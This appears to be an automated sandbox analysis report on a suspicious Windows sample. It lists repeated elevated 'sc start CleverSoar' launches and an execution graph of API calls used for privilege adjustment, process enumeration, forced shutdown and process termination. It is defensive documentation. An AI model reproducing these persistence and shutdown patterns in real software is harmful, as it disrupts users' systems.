                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:62
                                            Start time:01:52:35
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:63
                                            Start time:01:52:35
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:64
                                            Start time:01:52:35
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:65
                                            Start time:01:52:35
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:66
                                            Start time:01:52:35
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:67
                                            Start time:01:52:35
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:68
                                            Start time:01:52:35
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:69
                                            Start time:01:52:35
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:70
                                            Start time:01:52:35
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:72
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:73
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:74
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:75
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:76
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:77
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:78
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:79
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:80
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:81
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:82
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:83
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:84
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:85
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:86
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:87
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:88
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:89
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:90
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:91
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:92
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:93
                                            Start time:01:52:37
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:94
                                            Start time:01:52:37
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:95
                                            Start time:01:52:37
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:96
                                            Start time:01:52:37
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:97
                                            Start time:01:52:37
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:98
                                            Start time:01:52:37
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:99
                                            Start time:01:52:37
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:100
                                            Start time:01:52:37
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:101
                                            Start time:01:52:37
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:102
                                            Start time:01:52:37
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:103
                                            Start time:01:52:38
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:104
                                            Start time:01:52:38
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:105
                                            Start time:01:52:38
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:106
                                            Start time:01:52:38
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:107
                                            Start time:01:52:38
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff72bec0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:108
                                            Start time:01:52:38
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:267
                                            Start time:01:52:45
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\Conhost.exe
                                            Wow64 process (32bit):
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:
                                            Has administrator privileges:
                                            Programmed in:C, C++ or other language
                                            Has exited:false

                                            Disassembly

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:1.9%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:5.2%
                                              Total number of Nodes:727
                                              Total number of Limit Nodes:8
                                              execution_graph 63511 6c2101c3 63512 6c2101d5 __dosmaperr 63511->63512 63513 6c2101ed 63511->63513 63513->63512 63515 6c210267 63513->63515 63516 6c210238 __dosmaperr 63513->63516 63517 6c210280 63515->63517 63518 6c21029b __dosmaperr 63515->63518 63521 6c2102d7 __wsopen_s 63515->63521 63558 6c203810 18 API calls __Getctype 63516->63558 63517->63518 63520 6c210285 63517->63520 63551 6c203810 18 API calls __Getctype 63518->63551 63546 6c2150d5 63520->63546 63552 6c207eab HeapFree GetLastError __dosmaperr 63521->63552 63522 6c21042e 63525 6c2104a4 63522->63525 63528 6c210447 GetConsoleMode 63522->63528 63527 6c2104a8 ReadFile 63525->63527 63526 6c2102f7 63553 6c207eab HeapFree GetLastError __dosmaperr 63526->63553 63530 6c2104c2 63527->63530 63531 6c21051c GetLastError 63527->63531 63528->63525 63532 6c210458 63528->63532 63530->63531 63534 6c210499 63530->63534 63544 6c2102b2 __dosmaperr __wsopen_s 63531->63544 63532->63527 63535 6c21045e ReadConsoleW 63532->63535 63533 6c2102fe 63533->63544 63554 6c20e359 20 API calls __wsopen_s 63533->63554 63539 6c2104e7 63534->63539 63540 6c2104fe 63534->63540 63534->63544 63535->63534 63537 6c21047a GetLastError 63535->63537 63537->63544 63556 6c2105ee 23 API calls 3 library calls 63539->63556 63542 6c210515 63540->63542 63540->63544 63557 6c2108a6 21 API calls __wsopen_s 63542->63557 63555 6c207eab HeapFree GetLastError __dosmaperr 63544->63555 63545 6c21051a 63545->63544 63548 6c2150ef 63546->63548 63549 6c2150e2 63546->63549 63547 6c2150fb 63547->63522 63548->63547 63559 6c203810 18 API calls __Getctype 63548->63559 63549->63522 63551->63544 63552->63526 63553->63533 63554->63520 63555->63512 63556->63544 63557->63545 63558->63512 63559->63549 63560 6c074b53 63718 6c1fa133 63560->63718 63562 6c074b5c _Yarn 63732 6c1ee090 63562->63732 63564 6c09639e 63825 6c203820 18 API calls __Getctype 63564->63825 63566 6c074cff 63567 6c075164 CreateFileA CloseHandle 63572 6c0751ec 63567->63572 63568 6c074bae std::ios_base::_Ios_base_dtor 63568->63564 63568->63566 63568->63567 63569 6c08245a _Yarn _strlen 63568->63569 63569->63564 63570 6c1ee090 2 API calls 63569->63570 63586 6c082a83 std::ios_base::_Ios_base_dtor 63570->63586 63738 6c1f8810 OpenSCManagerA 63572->63738 63574 6c07fc00 63817 6c1f8930 CreateToolhelp32Snapshot 63574->63817 63577 6c1fa133 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 63613 6c075478 std::ios_base::_Ios_base_dtor _Yarn _strlen 63577->63613 63579 6c0837d0 Sleep 63624 6c0837e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 63579->63624 63580 6c1ee090 2 API calls 63580->63613 63581 6c0963b2 63826 6c0715e0 18 API calls std::ios_base::_Ios_base_dtor 63581->63826 63582 6c1f8930 4 API calls 63600 6c08053a 63582->63600 63584 6c1f8930 4 API calls 63606 6c0812e2 63584->63606 63585 6c0964f8 63586->63564 63742 6c1e0880 63586->63742 63587 6c07ffe3 63587->63582 63592 6c080abc 63587->63592 63588 6c096ba0 104 API calls 63588->63613 63589 6c096e60 32 API calls 63589->63613 63591 6c1f8930 4 API calls 63591->63592 63592->63569 63592->63584 63594 6c08211c 63594->63569 63596 6c08241a 63594->63596 63595 6c1f8930 4 API calls 63615 6c081dd9 63595->63615 63599 6c1e0880 10 API calls 63596->63599 63597 6c1ee090 2 API calls 63597->63624 63602 6c08244d 63599->63602 63600->63591 63600->63592 63601 6c076722 63793 6c1f4860 25 API calls 4 library calls 63601->63793 63823 6c1f9450 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 63602->63823 63604 6c082452 Sleep 63604->63569 63605 6c0816ac 63606->63594 63606->63595 63606->63605 63607 6c076162 63608 6c07740b 63794 6c1f86e0 CreateProcessA 63608->63794 63610 6c1f8930 4 API calls 63610->63594 63613->63564 63613->63574 63613->63577 63613->63580 63613->63588 63613->63589 63613->63601 63613->63607 63779 6c097090 63613->63779 63792 6c0be010 67 API calls 63613->63792 63614 6c097090 77 API calls 63614->63624 63615->63594 63615->63610 63617 6c07775a _strlen 63617->63564 63618 6c077b92 63617->63618 63619 6c077ba9 63617->63619 63622 6c077b43 _Yarn 63617->63622 63620 6c1fa133 std::_Facet_Register 4 API calls 63618->63620 63621 6c1fa133 std::_Facet_Register 4 API calls 63619->63621 63620->63622 63621->63622 63623 6c1ee090 2 API calls 63622->63623 63633 6c077be7 std::ios_base::_Ios_base_dtor 63623->63633 63624->63564 63624->63597 63624->63614 63750 6c096ba0 63624->63750 63769 6c096e60 63624->63769 63824 6c0be010 67 API calls 63624->63824 63625 6c1f86e0 4 API calls 63636 6c078a07 63625->63636 63626 6c079d7f 63630 6c1fa133 std::_Facet_Register 4 API calls 63626->63630 63627 6c079d68 63629 6c1fa133 std::_Facet_Register 4 API calls 63627->63629 63628 6c07962c _strlen 63628->63564 63628->63626 63628->63627 63631 6c079d18 _Yarn 63628->63631 63629->63631 63630->63631 63632 6c1ee090 2 API calls 63631->63632 63640 6c079dbd std::ios_base::_Ios_base_dtor 63632->63640 63633->63564 63633->63625 63633->63628 63634 6c078387 63633->63634 63635 6c1f86e0 4 API calls 63644 6c079120 63635->63644 63636->63635 63637 6c1f86e0 4 API calls 63654 6c07a215 _strlen 63637->63654 63638 6c1f86e0 4 API calls 63639 6c079624 63638->63639 63798 6c1f9450 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 63639->63798 63640->63564 63640->63637 63645 6c07e8b5 std::ios_base::_Ios_base_dtor _Yarn _strlen 63640->63645 63641 6c1fa133 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 63641->63645 63643 6c1ee090 2 API calls 63643->63645 63644->63638 63645->63564 63645->63641 63645->63643 63646 6c07ed02 Sleep 63645->63646 63647 6c07f7b1 63645->63647 63666 6c07e8c1 63646->63666 63816 6c1f9450 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 63647->63816 63649 6c07e8dd GetCurrentProcess TerminateProcess 63649->63645 63650 6c07a9a4 63652 6c1fa133 std::_Facet_Register 4 API calls 63650->63652 63651 6c07a9bb 63653 6c1fa133 std::_Facet_Register 4 API calls 63651->63653 63663 6c07a953 _Yarn _strlen 63652->63663 63653->63663 63654->63564 63654->63650 63654->63651 63654->63663 63655 6c1f86e0 4 API calls 63655->63666 63656 6c07fbb8 63658 6c07fbe8 ExitWindowsEx Sleep 63656->63658 63657 6c07f7c0 63657->63656 63658->63574 63659 6c07aff0 63661 6c1fa133 std::_Facet_Register 4 API calls 63659->63661 63660 6c07b009 63662 6c1fa133 std::_Facet_Register 4 API calls 63660->63662 63664 6c07afa0 _Yarn 63661->63664 63662->63664 63663->63581 63663->63659 63663->63660 63663->63664 63799 6c1f9050 63664->63799 63666->63645 63666->63649 63666->63655 63667 6c07b059 std::ios_base::_Ios_base_dtor _strlen 63667->63564 63668 6c07b443 63667->63668 63669 6c07b42c 63667->63669 63672 6c07b3da _Yarn _strlen 63667->63672 63671 6c1fa133 std::_Facet_Register 4 API calls 63668->63671 63670 6c1fa133 std::_Facet_Register 4 API calls 63669->63670 63670->63672 63671->63672 63672->63581 63673 6c07b7b7 63672->63673 63674 6c07b79e 63672->63674 63677 6c07b751 _Yarn 63672->63677 63676 6c1fa133 std::_Facet_Register 4 API calls 63673->63676 63675 6c1fa133 std::_Facet_Register 4 API calls 63674->63675 63675->63677 63676->63677 63678 6c1f9050 104 API calls 63677->63678 63679 6c07b804 std::ios_base::_Ios_base_dtor _strlen 